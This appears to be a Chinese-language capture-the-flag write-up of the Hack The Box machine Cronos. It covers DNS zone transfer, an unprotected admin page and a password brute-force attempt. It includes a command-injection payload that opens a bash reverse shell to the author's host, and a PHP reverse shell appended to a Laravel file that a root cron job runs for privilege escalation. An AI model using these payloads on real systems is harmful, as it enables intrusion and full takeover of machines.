Cronos Writeup
- 241216: Added missing title to block, which was previously omitted due to oversight.
超級簡單,說難度是中等你敢信?
靶機資訊
Machine | Description |
---|---|
Name | Cronos |
OS | Linux |
Difficulty | Medium |
Author | ch4p |
情蒐 Recon
服務掃描
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Cronos
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ sudo nmap -p- --min-rate 6969 10.129.239.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 21:02 EST
Nmap scan report for 10.129.239.126
Host is up (0.055s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 10.92 seconds
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ sudo nmap -p22,53,80 -sCV 10.129.239.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 21:04 EST
Nmap scan report for 10.129.239.126
Host is up (0.058s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Cronos
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.87 seconds
掃完標的發現開啟三個port,分別是SSH、DNS和HTTP,有開DNS,待會可以玩看看。
HTTP - Port 80
在連線之前先看看header裡面有沒有透露靶機的域名。
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ curl -sv -o /dev/null 10.129.239.126
* Trying 10.129.239.126:80...
* Connected to 10.129.239.126 (10.129.239.126) port 80
* using HTTP/1.x
> GET / HTTP/1.1
> Host: 10.129.239.126
> User-Agent: curl/8.10.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Date: Wed, 20 Nov 2024 02:10:05 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Last-Modified: Fri, 01 Jan 2021 00:29:56 GMT
< ETag: "2caf-5b7cbd6fbb19d"
< Accept-Ranges: bytes
< Content-Length: 11439
< Vary: Accept-Encoding
< Content-Type: text/html
<
{ [11439 bytes data]
* Connection #0 to host 10.129.239.126 left intact
結果沒有,只得知和nmap
掃描一樣的結果,網站是用apache架設的。
於是連線網頁,顯示了Ubuntu架設apache的預設頁面,基本上遇到這頁面代表者兩件事,不是網站設定錯誤, 就是我們沒有走對的route,所以apache不知道要把我們導向哪裡。
所以先找看看域名吧!
DNS - Port 53
在掃描的階段就已經發現DNS服務,於是嘗試使用dig -x
反向解析(reverse lookups)。
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ dig @10.129.239.126 -x 10.129.239.126
; <<>> DiG 9.20.2-1-Debian <<>> @10.129.239.126 -x 10.129.239.126
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 17915
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 2
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;126.239.129.10.in-addr.arpa. IN PTR
;; ANSWER SECTION:
126.239.129.10.in-addr.arpa. 604800 IN PTR ns1.cronos.htb.
;; AUTHORITY SECTION:
129.10.in-addr.arpa. 604800 IN NS ns1.cronos.htb.
;; ADDITIONAL SECTION:
ns1.cronos.htb. 604800 IN A 10.10.10.13
;; Query time: 56 msec
;; SERVER: 10.129.239.126#53(10.129.239.126) (UDP)
;; WHEN: Tue Nov 19 21:24:58 EST 2024
;; MSG SIZE rcvd: 114
IP反向解析出域名是cronos.htb
!除此之外,也可以嘗試「zone transfer (AXFR)」!
什麼是zone transfer?怎麼知道要利用zone transfer?
你不覺得剛剛nmap
掃出DNS聽53/TCP很奇怪嗎?
一般來說,DNS query只需要聆聽53/UDP,在此就是為了zone transfer功能才開啟TCP,
不然UDP封包大小上限不夠傳輸資料,除非資料大小小於512 byte。
詳細可以參考這篇zone transfer的解釋,和AXRF的範例。
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ dig axfr @10.129.239.126 cronos.htb
; <<>> DiG 9.20.2-1-Debian <<>> axfr @10.129.239.126 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 60 msec
;; SERVER: 10.129.239.126#53(10.129.239.126) (TCP)
;; WHEN: Tue Nov 19 21:17:04 EST 2024
;; XFR size: 7 records (messages 1, bytes 203
發現一個子網域admin,於是將它們加入到/etc/hosts
中。
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ echo "10.129.239.126 cronos.htb admin.cronos.htb" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.129.239.126 cronos.htb admin.cronos.htb
cronos.htb
連往cronos.htb
首頁,檢視頁面原始得知首頁中的連結全部連往 Laravel ,Laravel是一個很知名PHP的框架
,由此推測後端技術採用PHP。
本階段其餘完成事項
沒有有意思的資訊。
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ feroxbuster -u http://cronos.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://cronos.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 32w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 11l 32w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 85l 137w 2319c http://cronos.htb/
404 GET 9l 33w 287c http://cronos.htb/Program%20Files
301 GET 9l 28w 306c http://cronos.htb/css => http://cronos.htb/css/
200 GET 9l 1270w 118393c http://cronos.htb/css/app.css
200 GET 0l 0w 0c http://cronos.htb/favicon.ico
200 GET 85l 137w 2319c http://cronos.htb/index.php
301 GET 9l 28w 305c http://cronos.htb/js => http://cronos.htb/js/
200 GET 41l 5569w 284534c http://cronos.htb/js/app.js
200 GET 2l 3w 24c http://cronos.htb/robots.txt
200 GET 23l 59w 914c http://cronos.htb/web.config
[####################] - 10s 4742/4742 0s found:10 errors:0
[####################] - 9s 4735/4735 507/s http://cronos.htb/
[####################] - 1s 4735/4735 9230/s http://cronos.htb/css/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 1s 4735/4735 4735/s http://cronos.htb/js/ => Directory listing (add --scan-dir-listings to scan)
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ curl -s http://cronos.htb/web.config
<configuration>
<system.webServer>
<rewrite>
<rules>
<rule name="Imported Rule 1" stopProcessing="true">
<match url="^(.*)/$" ignoreCase="false" />
<conditions>
<add input="{REQUEST_FILENAME}" matchType="IsDirectory" ignoreCase="false" negate="true" />
</conditions>
<action type="Redirect" redirectType="Permanent" url="/{R:1}" />
</rule>
<rule name="Imported Rule 2" stopProcessing="true">
<match url="^" ignoreCase="false" />
<conditions>
<add input="{REQUEST_FILENAME}" matchType="IsDirectory" ignoreCase="false" negate="true" />
<add input="{REQUEST_FILENAME}" matchType="IsFile" ignoreCase="false" negate="true" />
</conditions>
<action type="Rewrite" url="index.php" />
</rule>
</rules>
</rewrite>
</system.webServer>
</configuration>
無效權限控管
admin.cronos.htb
是一登入頁面,需要帳號密碼,但是暴力猜密碼沒有成功,於是就特別針對php
檔案結尾暴力詳列目錄。
從掃描結果發現任意使用者可以在不登入的情況下取得welcome.php
。
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ feroxbuster -u http://admin.cronos.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt -x php
...
302 GET 0l 0w 0c http://admin.cronos.htb/logout.php => index.php
200 GET 56l 139w 1547c http://admin.cronos.htb/
200 GET 0l 0w 0c http://admin.cronos.htb/config.php
200 GET 56l 139w 1547c http://admin.cronos.htb/index.php
302 GET 20l 38w 439c http://admin.cronos.htb/welcome.php => index.php
302 GET 0l 0w 0c http://admin.cronos.htb/session.php => index.php
404 GET 9l 33w 293c http://admin.cronos.htb/Style%20Library
404 GET 9l 33w 297c http://admin.cronos.htb/Style%20Library.php
404 GET 9l 33w 290c http://admin.cronos.htb/modern%20mom
404 GET 9l 34w 295c http://admin.cronos.htb/neuf%20giga%20photo
404 GET 9l 33w 294c http://admin.cronos.htb/modern%20mom.php
404 GET 9l 34w 299c http://admin.cronos.htb/neuf%20giga%20photo.php
admin站點沒有做好權限管理,導致只要知道admin.cronos.htb/welcom.php
,
任何人都可以使用trace
和ping
的功能。
於是開啟Burp Suite,一邊側錄封包,一邊測試功能,
結果發現只有ping
功能可以正常使用。
發現命令注入
擷取到的封包顯示welcome.php
其實就只包含一個簡單傳送指令的功能。
command=<COMMAND>
和host=<IP>
兩個參數可以任意更改,於是嘗試命令注入curl
回連我方機器,結果web server確實GET
request。
準備Reverse Shell的payload:
command=bash%20-c%20'bash%20-i%20%3e%26%20%2fdev%2ftcp%2f10.10.14.10%2f8787%200%3e%261%20%23'&host=8.8.8.8
Command Injection Payload解釋
將payload經過url decode後得到:
其實就是很簡單的reverse shell指令,並在後方加上#
註解掉後面的IP。
成功取得Reverse Shell!
意外發現www-data
竟然有權限讀取noulis
家目錄。
www-data@cronos:/var/www/admin$ ls
ls
config.php
index.php
logout.php
session.php
welcome.php
www-data@cronos:/var/www/admin$ cat config.php
cat config.php
<?php
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'admin');
define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');
define('DB_DATABASE', 'admin');
$db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
?>
www-data@cronos:/var/www/admin$ cd /home
cd /home
www-data@cronos:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K May 10 2022 .
drwxr-xr-x 23 root root 4.0K May 10 2022 ..
drwxr-xr-x 4 noulis noulis 4.0K May 10 2022 noulis
www-data@cronos:/home$ ls noulis
ls noulis
user.txt
www-data@cronos:/home$ cat noulis/user.txt
cat noulis/user.txt
e37184fa832a858d65f55f9c0ff03205
本階段其餘完成事項
沒成功。
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ ffuf -request-proto http -request login.req -w /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-100000.txt -fs 1585
...
POST / HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://admin.cronos.htb
Connection: keep-alive
Referer: http://admin.cronos.htb/
Cookie: PHPSESSID=aoisqv2k4egh3llbkgvqgj13q1
Upgrade-Insecure-Requests: 1
Priority: u=0, i
username=admin&password=FUZZ
Crontab
提權
靶機的名稱暗示太大了,外加www-data
又有讀取/etc/crontab
的權限,哈,不看看怎麼行?
www-data@cronos:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
果然寫了些什麼,顯示root
每分鐘執行一次Laravel的artisan schedule:run
。 這代表著,如果我們能操縱artisan
,或是被artisan
帶起的服務,就能夠提權!
www-data@cronos:/$ ls -alh /var/www/laravel/artisan
ls -alh /var/www/laravel/artisan
-rwxr-xr-x 1 www-data www-data 1.7K Apr 9 2017 /var/www/laravel/artisan
首先檢查/var/www/laravel/artisan
的讀取權限,結果可讀可寫,讀取內容發現artisan
其實就是一份PHP檔,
現在理論上只要將PHP的reverse shell加入到該檔中,就可以等收root
的reverse shell回彈,
但是目前的session是dumb shell,沒辦法直接使用互動式vim
修改檔案,外加我想直接tee -a
code進去,
所以先看看哪份檔案適合加code到最後一行。
你想要的話,可以用python把dumb shell變「聰明」。
artisan
在最一開始引入兩份檔案:autoload.php
和app.php
,並在最後exit($status)
,
所以直接加入code到artisan
的最後面是不行的,因此看看其他兩份檔案。
www-data@cronos:/$ cat /var/www/laravel/artisan
cat /var/www/laravel/artisan
#!/usr/bin/env php
<?php
/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/
require __DIR__.'/bootstrap/autoload.php';
$app = require_once __DIR__.'/bootstrap/app.php';
...
$kernel->terminate($input, $status);
exit($status);
www-data@cronos:/var/www/laravel$ cat bootstrap/*.php
cat bootstrap/*.php
<?php
...
$app->singleton(
Illuminate\Contracts\Http\Kernel::class,
App\Http\Kernel::class
);
$app->singleton(
Illuminate\Contracts\Console\Kernel::class,
App\Console\Kernel::class
);
$app->singleton(
Illuminate\Contracts\Debug\ExceptionHandler::class,
App\Exceptions\Handler::class
);
...
return $app;
不適合加code在最後,因為return
。
<?php
define('LARAVEL_START', microtime(true));
/*
|--------------------------------------------------------------------------
| Register The Composer Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/
require __DIR__.'/../vendor/autoload.php';
最後加入payload至autoload.php
中,就可以等回連。
www-data@cronos:/var/www/laravel$ echo '$sock=fsockopen("10.10.14.10",8788);exec("/bin/sh -i <&3 >&3 2>&3");' | tee -a ./bootstrap/app.php
<c("/bin/sh -i <&3 >&3 2>&3");' | tee -a ./bootstrap/app.php
$sock=fsockopen("10.10.14.10",8788);exec("/bin/sh -i <&3 >&3 2>&3");
www-data@cronos:/var/www/laravel$ exit
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ nc -lvnp 8788
listening on [any] 8788 ...
connect to [10.10.14.10] from (UNKNOWN) [10.129.239.126] 47986
bash: cannot set terminal process group (10151): Inappropriate ioctl for device
bash: no job control in this shell
root@cronos:~# cat root.txt
cat root.txt
0e2da2d811079c6307c50a835b593f87